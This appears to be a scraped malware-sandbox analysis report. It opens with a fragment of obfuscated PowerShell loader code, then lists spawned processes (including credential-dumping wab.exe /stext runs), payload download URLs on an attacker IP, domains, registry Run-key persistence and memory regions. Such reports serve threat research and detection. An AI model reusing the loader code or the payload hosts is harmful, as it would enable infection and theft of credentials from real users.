DiglDgnp:DevoBmodsuBeninscantPidemRanaaVolagUndeeOutprAfbuitelo7Dist=Unin( PseTTelee OnyskrantWamp-PrasPForvaschetIntehSuml
Trih$ GalBBerou PronChobtOvermSkiba ledgScapeLeucrPlasiNonr2Taxa) All ') ;$Cyan=$Anticata[$pinnigr++%$Anticata.count];}Kultu
(Arkivkopie 'Jamm$ AcrgPhoslTyptoLazabkureaBrynl Kur:TangFModelcappiOverr afttPrueeDyreccheloTylelboks Verd=Taip ChanGshirefutitJean-RhegC
UnloSeksnMangtSunne DeanSuppt Con Fuse$MagnBTalkuConsnChortriddmStifaFirmgLoggeGuaprAffiiPeac2Meri ');Kultu (Arkivkopie '
Byg$ MingThawlSkidoDelib HelaUnrilCalg:prinrNicheHusskNonilTownaProamSylf App= Mas Alt[ForgSElviyAnstsChrot RepeEngsmExal.LiccCEfteo
PaunFlusvPadoe CrirVivitCise]Yuka:Visu:SoliFTcharSlumoNettmrengBDeklaArybsCorpeRadi6 Paa4RadiSManit FolrLegeiShegnaccegPale(sivs$GleyFKhaklfalhiDicorDisktWarveAralc
Odio Musl Non)Disp ');Kultu (Arkivkopie 'Fant$OvergSubtlAmbaoAnnubScoraSprilAqua:InkmAVetctTipstbenirKarniSognbAffiu PsatUdvlnMascaBril2
Kar Hyae= Til Nlde[TypoS FriyCymbsKombtKjelebyplm Sol.NemoTZitheTuinxChint Jat. AskERockn dimcRhinoDictdConsiCitenRighgFors]Catt:Nodd:UnesATrykS
UdsCComaIDoysI Pro.TestGSjape XyltStriS AnvtSamfrDentiAmrenParogKvil(Serv$KassrGedeeBlsekudfrl LosaPrismCate) Mat ');Kultu
(Arkivkopie 'calc$SandgTasklBraioPreabCortaReallPong:SpecARetvt UndtSnekrStabiBenbb MaauTegntIblanRegnaDiag3Klau=Ende$ phyA
RugtPrint Woor fraiHampbStifuBucetPluknTricaPoie2Over. BaasMycou StrbTilgsSvmmtRevarFakti SwinPhysgFari(Copa2styr6Ordk4Ravn8Bugs8Selv4
Cos, Oma1retr9Over0Brod8saka0 Suf)Tmre ');Kultu $Attributna3;};;
|
|
|
|
C:\Windows\SysWOW64\WerFault.exe
|
C:\Windows\SysWOW64\WerFault.exe -u -p 7288 -s 12
|
|
|
|
C:\Windows\SysWOW64\WerFault.exe
|
C:\Windows\SysWOW64\WerFault.exe -u -p 7272 -s 12
|
|
|
|
C:\Windows\SysWOW64\WerFault.exe
|
C:\Windows\SysWOW64\WerFault.exe -u -p 3324 -s 12
|
|
|
|
C:\Program Files (x86)\Windows Mail\wab.exe
|
C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\wbvc
|
|
|
|
C:\Program Files (x86)\Windows Mail\wab.exe
|
C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\wbvc
|
|
|
|
C:\Program Files (x86)\Windows Mail\wab.exe
|
C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\zwauomm
|
|
|
|
C:\Program Files (x86)\Windows Mail\wab.exe
|
C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\jqgfpewoff
|
|
|
|
C:\Windows\SysWOW64\WerFault.exe
|
C:\Windows\SysWOW64\WerFault.exe -u -p 4560 -s 12
|
|
|
|
C:\Program Files (x86)\Windows Mail\wab.exe
|
C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\ohhpmvctpkdbtqruwyovibylqayanbzqe
|
|
|
|
C:\Program Files (x86)\Windows Mail\wab.exe
|
C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\qbmhno
|
|
|
|
C:\Program Files (x86)\Windows Mail\wab.exe
|
C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\bdsaogxor
|
|
|
|
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
||
|
C:\Windows\System32\cmd.exe
|
C:\Windows\system32\cmd.exe" /c "echo 1 && exit
|
||
|
C:\Windows\SysWOW64\cmd.exe
|
C:\Windows\system32\cmd.exe" /c "echo 1 && exit
|
||
|
C:\Windows\System32\svchost.exe
|
C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
|
||
|
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
||
|
C:\Windows\SysWOW64\cmd.exe
|
C:\Windows\system32\cmd.exe" /c "echo 1 && exit
|
There are 19 hidden processes, click here to show them.
URLs
|
Name
|
IP
|
Malicious
|
|
|---|---|---|---|
|
http://85.209.176.46/clino.ttf
|
85.209.176.46
|
|
|
|
http://pesterbdd.com/images/Pester.png
|
unknown
|
|
|
|
http://85.209.176.46/AIbTlARMalRGYMmJkhXeKMcq42.bin
|
85.209.176.46
|
|
|
|
http://85.209.176.46/zAOejBDvzeNzCmAWtEnz61.bin
|
85.209.176.46
|
|
|
|
http://geoplugin.net/json.gp
|
178.237.33.50
|
|
|
|
http://85.209.176.46/Soothing.hhk
|
85.209.176.46
|
|
|
|
http
|
|
||
|
http://85.209.176.46/clino.ttfhk
|
unknown
|
||
|
http://85.209.176.46/Soothing.hhkQ:
|
unknown
|
||
|
http://nuget.org/NuGet.exe
|
unknown
|
||
|
http://85.209.176.46/
|
unknown
|
||
|
http://crl.microsoft
|
unknown
|
||
|
http://www.apache.org/licenses/LICENSE-2.0.html
|
unknown
|
||
|
http://85.209.176.46/d
|
unknown
|
||
|
https://go.micro
|
unknown
|
||
|
https://contoso.com/License
|
unknown
|
||
|
http://geoplugin.net/json.gpvG
|
unknown
|
||
|
https://contoso.com/Icon
|
unknown
|
||
|
http://ecox.pt/Soothing.hhk
|
unknown
|
||
|
https://github.com/Pester/Pester
|
unknown
|
||
|
http://85.209.176.46:80/clino.ttf
|
unknown
|
||
|
https://g.live.com/odclientsettings/Prod-C:
|
unknown
|
||
|
https://aka.ms/pscore6lB
|
unknown
|
||
|
http://85.209.176.46/zAOejBDvzeNzCmAWtEnz61.binEW
|
unknown
|
||
|
https://contoso.com/
|
unknown
|
||
|
https://g.live.com/odclientsettings/ProdV2-C:
|
unknown
|
||
|
https://nuget.org/nuget.exe
|
unknown
|
||
|
http://ecox.pt/Soothing.hhkH
|
unknown
|
||
|
http://crl.microz
|
unknown
|
||
|
https://aka.ms/pscore68
|
unknown
|
||
|
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
|
unknown
|
||
|
http://85.209.176.46/Soothing.hhkse
|
unknown
|
There are 22 hidden URLs, click here to show them.
Domains
|
Name
|
IP
|
Malicious
|
|
|---|---|---|---|
|
www.spirdrain.xyz
|
66.29.149.46
|
|
|
|
www.nasyoeastasia.org
|
unknown
|
|
|
|
www.liangyuen528.com
|
unknown
|
|
|
|
geoplugin.net
|
178.237.33.50
|
||
|
nasyoeastasia.org
|
192.185.129.44
|
IPs
|
IP
|
Domain
|
Country
|
Malicious
|
|
|---|---|---|---|---|
|
85.209.176.69
|
unknown
|
United Kingdom
|
|
|
|
85.209.176.46
|
unknown
|
United Kingdom
|
|
|
|
178.237.33.50
|
geoplugin.net
|
Netherlands
|
||
|
127.0.0.1
|
unknown
|
unknown
|
Registry
|
Path
|
Value
|
Malicious
|
|
|---|---|---|---|
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\BITS
|
PerfMMFileName
|
||
|
HKEY_CURRENT_USER\Chinagruel
|
Idoisme
|
||
|
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
|
Ernrin
|
||
|
HKEY_CURRENT_USER\Environment
|
Wirlasa
|
||
|
HKEY_CURRENT_USER\SOFTWARE\lipegtst-A9RE3F
|
exepath
|
||
|
HKEY_CURRENT_USER\SOFTWARE\lipegtst-A9RE3F
|
licence
|
||
|
HKEY_CURRENT_USER\SOFTWARE\lipegtst-A9RE3F
|
time
|
||
|
HKEY_CURRENT_USER_Classes\Local Settings\Software\Microsoft\Windows\Shell\MuiCache
|
LangID
|
||
|
HKEY_CURRENT_USER_Classes\Local Settings\Software\Microsoft\Windows\Shell\MuiCache
|
C:\Windows\System32\WScript.exe.FriendlyAppName
|
||
|
HKEY_CURRENT_USER_Classes\Local Settings\Software\Microsoft\Windows\Shell\MuiCache
|
C:\Windows\System32\WScript.exe.ApplicationCompany
|
Memdumps
|
Base Address
|
Regiontype
|
Protect
|
Malicious
|
|
|---|---|---|---|---|
|
23151000
|
direct allocation
|
page execute and read and write
|
|
|
|
9949000
|
direct allocation
|
page execute and read and write
|
|
|
|
AD1F000
|
direct allocation
|
page execute and read and write
|
|
|
|
5726000
|
trusted library allocation
|
page read and write
|
|
|
|
9080000
|
direct allocation
|
page execute and read and write
|
|
|
|
8590000
|
direct allocation
|
page execute and read and write
|
|
|
|
6217000
|
trusted library allocation
|
page read and write
|
|
|
|
3493000
|
trusted library allocation
|
page execute and read and write
|
||
|
B32E5FB000
|
stack
|
page read and write
|
||
|
7FF7C1320000
|
trusted library allocation
|
page execute and read and write
|
||
|
3440000
|
heap
|
page read and write
|
||
|
212A0000
|
direct allocation
|
page read and write
|
||
|
27201E9B000
|
heap
|
page read and write
|
||
|
1E63F41D000
|
heap
|
page read and write
|
||
|
2B3D000
|
heap
|
page read and write
|
||
|
305C000
|
stack
|
page read and write
|
||
|
27203642000
|
heap
|
page read and write
|
||
|
9140000
|
direct allocation
|
page read and write
|
||
|
2846000
|
heap
|
page read and write
|
||
|
35CE000
|
heap
|
page read and write
|
||
|
B32D87E000
|
stack
|
page read and write
|
||
|
613A000
|
heap
|
page read and write
|
||
|
6E70000
|
direct allocation
|
page read and write
|
||
|
6E80000
|
direct allocation
|
page read and write
|
||
|
3490000
|
trusted library allocation
|
page read and write
|
||
|
3630000
|
heap
|
page read and write
|
||
|
61B5000
|
heap
|
page read and write
|
||
|
34F0000
|
trusted library allocation
|
page read and write
|
||
|
1E639EB2000
|
heap
|
page read and write
|
||
|
1FC06084000
|
heap
|
page read and write
|
||
|
22D00000
|
unclassified section
|
page execute and read and write
|
||
|
37FB000
|
heap
|
page read and write
|
||
|
1FC079D0000
|
heap
|
page read and write
|
||
|
61C1000
|
heap
|
page read and write
|
||
|
422000
|
system
|
page execute and read and write
|
||
|
30FF000
|
remote allocation
|
page execute and read and write
|
||
|
2B17000
|
heap
|
page read and write
|
||
|
34B0000
|
trusted library allocation
|
page read and write
|
||
|
1E63F200000
|
trusted library allocation
|
page read and write
|
||
|
2895000
|
heap
|
page read and write
|
||
|
1E639E13000
|
heap
|
page read and write
|
||
|
616C000
|
heap
|
page read and write
|
||
|
2AD4000
|
heap
|
page read and write
|
||
|
4580000
|
heap
|
page read and write
|
||
|
22141000
|
heap
|
page read and write
|
||
|
27201C17000
|
heap
|
page read and write
|
||
|
616C000
|
heap
|
page read and write
|
||
|
B80000
|
heap
|
page read and write
|
||
|
4430000
|
heap
|
page execute and read and write
|
||
|
834E000
|
stack
|
page read and write
|
||
|
501E000
|
stack
|
page read and write
|
||
|
2B26000
|
heap
|
page read and write
|
||
|
1E63A400000
|
heap
|
page read and write
|
||
|
44ED000
|
stack
|
page read and write
|
||
|
2B23000
|
heap
|
page read and write
|
||
|
27203645000
|
heap
|
page read and write
|
||
|
400000
|
system
|
page execute and read and write
|
||
|
455000
|
system
|
page execute and read and write
|
||
|
1FC09879000
|
trusted library allocation
|
page read and write
|
||
|
7C40000
|
trusted library allocation
|
page read and write
|
||
|
22C35000
|
unclassified section
|
page execute and read and write
|
||
|
6955000
|
heap
|
page execute and read and write
|
||
|
3530000
|
heap
|
page read and write
|
||
|
22B10000
|
unclassified section
|
page execute and read and write
|
||
|
1FB6C7B0000
|
heap
|
page read and write
|
||
|
27201C40000
|
heap
|
page read and write
|
||
|
27201C43000
|
heap
|
page read and write
|
||
|
560000
|
unclassified section
|
page readonly
|
||
|
2A78000
|
heap
|
page read and write
|
||
|
64D0000
|
heap
|
page read and write
|
||
|
56EC000
|
stack
|
page read and write
|
||
|
1E639C20000
|
heap
|
page read and write
|
||
|
B32DBFE000
|
unkown
|
page readonly
|
||
|
2A5E000
|
stack
|
page read and write
|
||
|
3494000
|
trusted library allocation
|
page read and write
|
||
|
1E63F350000
|
trusted library allocation
|
page read and write
|
||
|
4BD1000
|
heap
|
page read and write
|
||
|
A9E000
|
stack
|
page read and write
|
||
|
88B0000
|
trusted library allocation
|
page read and write
|
||
|
2B5B000
|
heap
|
page read and write
|
||
|
7FF7C14F0000
|
trusted library allocation
|
page read and write
|
||
|
37F0000
|
heap
|
page read and write
|
||
|
8990000
|
trusted library allocation
|
page read and write
|
||
|
27203B13000
|
heap
|
page read and write
|
||
|
7510000
|
direct allocation
|
page read and write
|
||
|
33E0000
|
heap
|
page read and write
|
||
|
6161000
|
heap
|
page read and write
|
||
|
7420000
|
trusted library allocation
|
page read and write
|
||
|
27203AF1000
|
heap
|
page read and write
|
||
|
23096000
|
unclassified section
|
page execute and read and write
|
||
|
21230000
|
direct allocation
|
page read and write
|
||
|
6950000
|
heap
|
page execute and read and write
|
||
|
1FC0602D000
|
heap
|
page read and write
|
||
|
7FF7C14B0000
|
trusted library allocation
|
page read and write
|
||
|
8500000
|
trusted library allocation
|
page execute and read and write
|
||
|
2B3E000
|
heap
|
page read and write
|
||
|
D30000
|
unclassified section
|
page readonly
|
||
|
229B5000
|
unclassified section
|
page execute and read and write
|
||
|
22BE0000
|
unclassified section
|
page execute and read and write
|
||
|
22E60000
|
unclassified section
|
page execute and read and write
|
||
|
1E639E9B000
|
heap
|
page read and write
|
||
|
27201BAB000
|
heap
|
page read and write
|
||
|
1E63A390000
|
trusted library allocation
|
page read and write
|
||
|
2B17000
|
heap
|
page read and write
|
||
|
1FC098A9000
|
trusted library allocation
|
page read and write
|
||
|
21E41000
|
heap
|
page read and write
|
||
|
23F0000
|
heap
|
page read and write
|
||
|
2B06000
|
heap
|
page read and write
|
||
|
27201C21000
|
heap
|
page read and write
|
||
|
618D000
|
heap
|
page read and write
|
||
|
1E63A51A000
|
heap
|
page read and write
|
||
|
218D0000
|
heap
|
page read and write
|
||
|
1FC06043000
|
heap
|
page read and write
|
||
|
317E000
|
stack
|
page read and write
|
||
|
497E000
|
stack
|
page read and write
|
||
|
28DE000
|
stack
|
page read and write
|
||
|
77A0000
|
heap
|
page read and write
|
||
|
23180000
|
heap
|
page read and write
|
||
|
1FB6C740000
|
heap
|
page read and write
|
||
|
2175D000
|
stack
|
page read and write
|
||
|
2B0B000
|
heap
|
page read and write
|
||
|
212D0000
|
direct allocation
|
page read and write
|
||
|
1FC06397000
|
heap
|
page read and write
|
||
|
54B5000
|
heap
|
page read and write
|
||
|
600000
|
unclassified section
|
page readonly
|
||
|
1E639EB4000
|
heap
|
page read and write
|
||
|
2B4B000
|
heap
|
page read and write
|
||
|
89F6000
|
heap
|
page read and write
|
||
|
73B0000
|
trusted library allocation
|
page read and write
|
||
|
27201C44000
|
heap
|
page read and write
|
||
|
1FC060AD000
|
heap
|
page read and write
|
||
|
1E63F41D000
|
heap
|
page read and write
|
||
|
27201C08000
|
heap
|
page read and write
|
||
|
1FC2003E000
|
heap
|
page read and write
|
||
|
7CFE000
|
stack
|
page read and write
|
||
|
27201C3F000
|
heap
|
page read and write
|
||
|
22CF6000
|
unclassified section
|
page execute and read and write
|
||
|
1FC20290000
|
heap
|
page read and write
|
||
|
2B2B000
|
heap
|
page read and write
|
||
|
1FC1FF92000
|
heap
|
page read and write
|
||
|
34AD000
|
trusted library allocation
|
page execute and read and write
|
||
|
1E639E6E000
|
heap
|
page read and write
|
||
|
7FF7C12E6000
|
trusted library allocation
|
page execute and read and write
|
||
|
337E000
|
stack
|
page read and write
|
||
|
2181D000
|
stack
|
page read and write
|
||
|
422000
|
system
|
page execute and read and write
|
||
|
22418000
|
heap
|
page read and write
|
||
|
21CBF000
|
stack
|
page read and write
|
||
|
21B7C000
|
stack
|
page read and write
|
||
|
22780000
|
unclassified section
|
page execute and read and write
|
||
|
70F4000
|
heap
|
page read and write
|
||
|
801A000
|
heap
|
page read and write
|
||
|
22750000
|
unclassified section
|
page execute and read and write
|
||
|
46AE000
|
trusted library allocation
|
page read and write
|
||
|
B32E77E000
|
stack
|
page read and write
|
||
|
27201BF6000
|
heap
|
page read and write
|
||
|
7DD0000
|
trusted library allocation
|
page read and write
|
||
|
2BC0000
|
trusted library allocation
|
page read and write
|
||
|
1FC060B2000
|
heap
|
page read and write
|
||
|
74F0000
|
direct allocation
|
page read and write
|
||
|
6D98000
|
heap
|
page read and write
|
||
|
CB49000
|
direct allocation
|
page execute and read and write
|
||
|
2AD4000
|
heap
|
page read and write
|
||
|
B32F1FE000
|
unkown
|
page readonly
|
||
|
2A70000
|
trusted library section
|
page read and write
|
||
|
1FC08069000
|
trusted library allocation
|
page read and write
|
||
|
7B19000
|
heap
|
page read and write
|
||
|
2FBD000
|
stack
|
page read and write
|
||
|
7FF7C1460000
|
trusted library allocation
|
page read and write
|
||
|
1FC0606C000
|
heap
|
page read and write
|
||
|
6FA2000
|
heap
|
page read and write
|
||
|
7FE8000
|
heap
|
page read and write
|
||
|
61C9000
|
trusted library allocation
|
page read and write
|
||
|
1FC1FB40000
|
heap
|
page read and write
|
||
|
7CBE000
|
stack
|
page read and write
|
||
|
230B0000
|
unclassified section
|
page execute and read and write
|
||
|
27203647000
|
heap
|
page read and write
|
||
|
2B19000
|
heap
|
page read and write
|
||
|
60D58FD000
|
stack
|
page read and write
|
||
|
89A0000
|
heap
|
page read and write
|
||
|
7DB0000
|
trusted library allocation
|
page read and write
|
||
|
7D90000
|
trusted library allocation
|
page read and write
|
||
|
2B94000
|
trusted library allocation
|
page read and write
|
||
|
893E000
|
stack
|
page read and write
|
||
|
7530000
|
direct allocation
|
page read and write
|
||
|
54B2000
|
heap
|
page read and write
|
||
|
3480000
|
trusted library allocation
|
page read and write
|
||
|
22FE0000
|
unclassified section
|
page execute and read and write
|
||
|
60D6B8B000
|
stack
|
page read and write
|
||
|
400000
|
system
|
page execute and read and write
|
||
|
614B000
|
heap
|
page read and write
|
||
|
227E0000
|
unclassified section
|
page execute and read and write
|
||
|
27201C6F000
|
heap
|
page read and write
|
||
|
2BE0000
|
trusted library allocation
|
page read and write
|
||
|
1FC20065000
|
heap
|
page read and write
|
||
|
22F85000
|
unclassified section
|
page execute and read and write
|
||
|
FFFC1FD000
|
stack
|
page read and write
|
||
|
7B00000
|
direct allocation
|
page read and write
|
||
|
1E63F340000
|
trusted library allocation
|
page read and write
|
||
|
FFFB71A000
|
stack
|
page read and write
|
||
|
23C0000
|
unclassified section
|
page readonly
|
||
|
8580000
|
trusted library allocation
|
page execute and read and write
|
||
|
27203645000
|
heap
|
page read and write
|
||
|
2B49000
|
heap
|
page read and write
|
||
|
6B40000
|
direct allocation
|
page read and write
|
||
|
1E639E74000
|
heap
|
page read and write
|
||
|
1E63AD80000
|
trusted library section
|
page readonly
|
||
|
27201C49000
|
heap
|
page read and write
|
||
|
1E63A55B000
|
heap
|
page read and write
|
||
|
27203B1F000
|
heap
|
page read and write
|
||
|
7FF7C12C0000
|
trusted library allocation
|
page execute and read and write
|
||
|
7E70000
|
heap
|
page read and write
|
||
|
1E63F24F000
|
trusted library allocation
|
page read and write
|
||
|
21E36000
|
unclassified section
|
page execute and read and write
|
||
|
2DDE000
|
stack
|
page read and write
|
||
|
64D7000
|
heap
|
page read and write
|
||
|
1E63F224000
|
trusted library allocation
|
page read and write
|
||
|
6D70000
|
heap
|
page read and write
|
||
|
223C0000
|
heap
|
page read and write
|
||
|
27201C1F000
|
heap
|
page read and write
|
||
|
B32DDFE000
|
stack
|
page read and write
|
||
|
2A91000
|
heap
|
page read and write
|
||
|
60E8000
|
heap
|
page read and write
|
||
|
2B31000
|
heap
|
page read and write
|
||
|
6EA0000
|
direct allocation
|
page read and write
|
||
|
1E63ACA0000
|
trusted library allocation
|
page read and write
|
||
|
70D8000
|
heap
|
page read and write
|
||
|
2B68000
|
heap
|
page read and write
|
||
|
7EE0000
|
trusted library allocation
|
page read and write
|
||
|
2840000
|
heap
|
page read and write
|
||
|
2B58000
|
heap
|
page read and write
|
||
|
910000
|
unclassified section
|
page readonly
|
||
|
B32EEFE000
|
unkown
|
page readonly
|
||
|
21E40000
|
heap
|
page read and write
|
||
|
5A82000
|
trusted library allocation
|
page read and write
|
||
|
4D0E000
|
stack
|
page read and write
|
||
|
5721000
|
trusted library allocation
|
page read and write
|
||
|
1FC09469000
|
trusted library allocation
|
page read and write
|
||
|
8510000
|
trusted library allocation
|
page read and write
|
||
|
2B44000
|
heap
|
page read and write
|
||
|
7E20000
|
trusted library allocation
|
page read and write
|
||
|
1E63AA40000
|
trusted library allocation
|
page read and write
|
||
|
1FC06066000
|
heap
|
page read and write
|
||
|
8C1C000
|
stack
|
page read and write
|
||
|
6AAD000
|
stack
|
page read and write
|
||
|
D40000
|
heap
|
page read and write
|
||
|
1FC07D71000
|
trusted library allocation
|
page read and write
|
||
|
615B000
|
heap
|
page read and write
|
||
|
2B1F000
|
heap
|
page read and write
|
||
|
2AFA000
|
heap
|
page read and write
|
||
|
7FF7C1440000
|
trusted library allocation
|
page read and write
|
||
|
7FF7C1500000
|
trusted library allocation
|
page read and write
|
||
|
6B10000
|
direct allocation
|
page read and write
|
||
|
615B000
|
heap
|
page read and write
|
||
|
1FC07FA0000
|
trusted library allocation
|
page read and write
|
||
|
4DE4000
|
trusted library allocation
|
page read and write
|
||
|
27201C21000
|
heap
|
page read and write
|
||
|
22340000
|
heap
|
page read and write
|
||
|
58FF000
|
remote allocation
|
page execute and read and write
|
||
|
21ABE000
|
stack
|
page read and write
|
||
|
1E63F1E9000
|
trusted library allocation
|
page read and write
|
||
|
228D0000
|
unclassified section
|
page execute and read and write
|
||
|
1FB6C560000
|
heap
|
page read and write
|
||
|
7E10000
|
trusted library allocation
|
page read and write
|
||
|
B32E8FE000
|
unkown
|
page readonly
|
||
|
22BC6000
|
unclassified section
|
page execute and read and write
|
||
|
22860000
|
unclassified section
|
page execute and read and write
|
||
|
1E63F440000
|
heap
|
page read and write
|
||
|
81C5000
|
trusted library allocation
|
page read and write
|
||
|
21C7D000
|
stack
|
page read and write
|
||
|
1FC05FC0000
|
heap
|
page read and write
|
||
|
1E63F499000
|
heap
|
page read and write
|
||
|
7BAB000
|
trusted library allocation
|
page read and write
|
||
|
D549000
|
direct allocation
|
page execute and read and write
|
||
|
2B2F000
|
heap
|
page read and write
|
||
|
2AEF000
|
heap
|
page read and write
|
||
|
1E63A791000
|
trusted library allocation
|
page read and write
|
||
|
1E63F220000
|
trusted library allocation
|
page read and write
|
||
|
1FC05FB0000
|
heap
|
page read and write
|
||
|
55B9000
|
trusted library allocation
|
page read and write
|
||
|
27201C08000
|
heap
|
page read and write
|
||
|
1FC094D9000
|
trusted library allocation
|
page read and write
|
||
|
27201BE1000
|
heap
|
page read and write
|
||
|
2AD4000
|
heap
|
page read and write
|
||
|
72EF000
|
stack
|
page read and write
|
||
|
223E7000
|
heap
|
page read and write
|
||
|
34C8000
|
heap
|
page read and write
|
||
|
27201C08000
|
heap
|
page read and write
|
||
|
2720364C000
|
heap
|
page read and write
|
||
|
359C000
|
heap
|
page read and write
|
||
|
1E63ADD0000
|
trusted library section
|
page readonly
|
||
|
2171F000
|
stack
|
page read and write
|
||
|
52BF000
|
trusted library allocation
|
page read and write
|
||
|
27203780000
|
heap
|
page read and write
|
||
|
8880000
|
heap
|
page read and write
|
||
|
21BBF000
|
stack
|
page read and write
|
||
|
212B0000
|
direct allocation
|
page read and write
|
||
|
7B90000
|
trusted library allocation
|
page read and write
|
||
|
21FD0000
|
heap
|
page read and write
|
||
|
4F9E000
|
stack
|
page read and write
|
||
|
B32F5FE000
|
unkown
|
page readonly
|
||
|
B32E87E000
|
stack
|
page read and write
|
||
|
6B00000
|
direct allocation
|
page read and write
|
||
|
27201C27000
|
heap
|
page read and write
|
||
|
440F000
|
stack
|
page read and write
|
||
|
1E63A402000
|
heap
|
page read and write
|
||
|
7FF7C13C0000
|
trusted library allocation
|
page execute and read and write
|
||
|
60D5CFE000
|
stack
|
page read and write
|
||
|
44FF000
|
remote allocation
|
page execute and read and write
|
||
|
4BED000
|
heap
|
page read and write
|
||
|
1FC202BD000
|
heap
|
page read and write
|
||
|
2AEF000
|
heap
|
page read and write
|
||
|
1E63F330000
|
trusted library allocation
|
page read and write
|
||
|
7FF7C14D0000
|
trusted library allocation
|
page read and write
|
||
|
2A90000
|
heap
|
page read and write
|
||
|
400000
|
system
|
page execute and read and write
|
||
|
27201C69000
|
heap
|
page read and write
|
||
|
2B19000
|
heap
|
page read and write
|
||
|
1E63F416000
|
heap
|
page read and write
|
||
|
991F000
|
direct allocation
|
page execute and read and write
|
||
|
7200000
|
trusted library allocation
|
page read and write
|
||
|
6170000
|
heap
|
page read and write
|
||
|
342E000
|
stack
|
page read and write
|
||
|
1FC07BC7000
|
trusted library allocation
|
page read and write
|
||
|
27201C5E000
|
heap
|
page read and write
|
||
|
27201C6C000
|
heap
|
page read and write
|
||
|
27201C63000
|
heap
|
page read and write
|
||
|
509F000
|
stack
|
page read and write
|
||
|
7D3E000
|
stack
|
page read and write
|
||
|
7520000
|
direct allocation
|
page read and write
|
||
|
1FC202F5000
|
heap
|
page read and write
|
||
|
6192000
|
heap
|
page read and write
|
||
|
4CD8000
|
trusted library allocation
|
page read and write
|
||
|
801E000
|
heap
|
page read and write
|
||
|
8970000
|
trusted library allocation
|
page read and write
|
||
|
B32EB7E000
|
stack
|
page read and write
|
||
|
7090000
|
heap
|
page read and write
|
||
|
1E63F1D0000
|
trusted library allocation
|
page read and write
|
||
|
7FF7C14C0000
|
trusted library allocation
|
page read and write
|
||
|
1FC06064000
|
heap
|
page read and write
|
||
|
6CEB000
|
stack
|
page read and write
|
||
|
1FC20160000
|
heap
|
page execute and read and write
|
||
|
2B04000
|
heap
|
page read and write
|
||
|
27201AF0000
|
heap
|
page read and write
|
||
|
21260000
|
direct allocation
|
page read and write
|
||
|
7DF0000
|
trusted library allocation
|
page read and write
|
||
|
29D0000
|
heap
|
page read and write
|
||
|
5110000
|
heap
|
page execute and read and write
|
||
|
B32D56B000
|
stack
|
page read and write
|
||
|
455E000
|
stack
|
page read and write
|
||
|
70E8000
|
heap
|
page read and write
|
||
|
1E639E0B000
|
heap
|
page read and write
|
||
|
1FC0611E000
|
heap
|
page read and write
|
||
|
7380000
|
trusted library allocation
|
page read and write
|
||
|
7FF7C13E2000
|
trusted library allocation
|
page read and write
|
||
|
1FC1FFE3000
|
heap
|
page read and write
|
||
|
1FC06390000
|
heap
|
page read and write
|
||
|
27201B92000
|
heap
|
page read and write
|
||
|
7ACF000
|
heap
|
page read and write
|
||
|
1E63A513000
|
heap
|
page read and write
|
||
|
4ACE000
|
stack
|
page read and write
|
||
|
1FC06020000
|
heap
|
page read and write
|
||
|
27201C40000
|
heap
|
page read and write
|
||
|
6E90000
|
direct allocation
|
page read and write
|
||
|
61B5000
|
heap
|
page read and write
|
||
|
7FF7C13D0000
|
trusted library allocation
|
page execute and read and write
|
||
|
1E639E8C000
|
heap
|
page read and write
|
||
|
27201C0C000
|
heap
|
page read and write
|
||
|
3460000
|
trusted library section
|
page read and write
|
||
|
54D7000
|
heap
|
page read and write
|
||
|
2300000
|
unclassified section
|
page readonly
|
||
|
1FC08065000
|
trusted library allocation
|
page read and write
|
||
|
476000
|
system
|
page execute and read and write
|
||
|
8960000
|
trusted library allocation
|
page read and write
|
||
|
1FC20120000
|
heap
|
page execute and read and write
|
||
|
27201C27000
|
heap
|
page read and write
|
||
|
6174000
|
heap
|
page read and write
|
||
|
73E0000
|
trusted library allocation
|
page read and write
|
||
|
6F2E000
|
stack
|
page read and write
|
||
|
27201BF6000
|
heap
|
page read and write
|
||
|
2AF7000
|
heap
|
page read and write
|
||
|
2958000
|
heap
|
page read and write
|
||
|
616C000
|
heap
|
page read and write
|
||
|
6030000
|
heap
|
page read and write
|
||
|
27201C17000
|
heap
|
page read and write
|
||
|
27201B89000
|
heap
|
page read and write
|
||
|
8C30000
|
trusted library allocation
|
page execute and read and write
|
||
|
21A3D000
|
stack
|
page read and write
|
||
|
7AF7000
|
heap
|
page read and write
|
||
|
27201C0C000
|
heap
|
page read and write
|
||
|
8870000
|
heap
|
page read and write
|
||
|
1FC06036000
|
heap
|
page read and write
|
||
|
2849000
|
heap
|
page read and write
|
||
|
2B17000
|
heap
|
page read and write
|
||
|
1E63F400000
|
heap
|
page read and write
|
||
|
7FF7C1570000
|
trusted library allocation
|
page read and write
|
||
|
223E7000
|
heap
|
page read and write
|
||
|
717C000
|
heap
|
page read and write
|
||
|
22FC2000
|
unclassified section
|
page execute and read and write
|
||
|
229F2000
|
unclassified section
|
page execute and read and write
|
||
|
747C000
|
stack
|
page read and write
|
||
|
2AF7000
|
heap
|
page read and write
|
||
|
7220000
|
trusted library allocation
|
page read and write
|
||
|
27201C66000
|
heap
|
page read and write
|
||
|
A5E000
|
unkown
|
page read and write
|
||
|
1FC201B5000
|
heap
|
page read and write
|
||
|
1FC17BB3000
|
trusted library allocation
|
page read and write
|
||
|
7FF7C1480000
|
trusted library allocation
|
page read and write
|
||
|
2B48000
|
heap
|
page read and write
|
||
|
2CEC000
|
stack
|
page read and write
|
||
|
54B0000
|
heap
|
page read and write
|
||
|
89A6000
|
heap
|
page read and write
|
||
|
740000
|
heap
|
page read and write
|
||
|
2B68000
|
heap
|
page read and write
|
||
|
1FC1FF90000
|
heap
|
page read and write
|
||
|
6123000
|
heap
|
page read and write
|
||
|
323C000
|
stack
|
page read and write
|
||
|
27201C31000
|
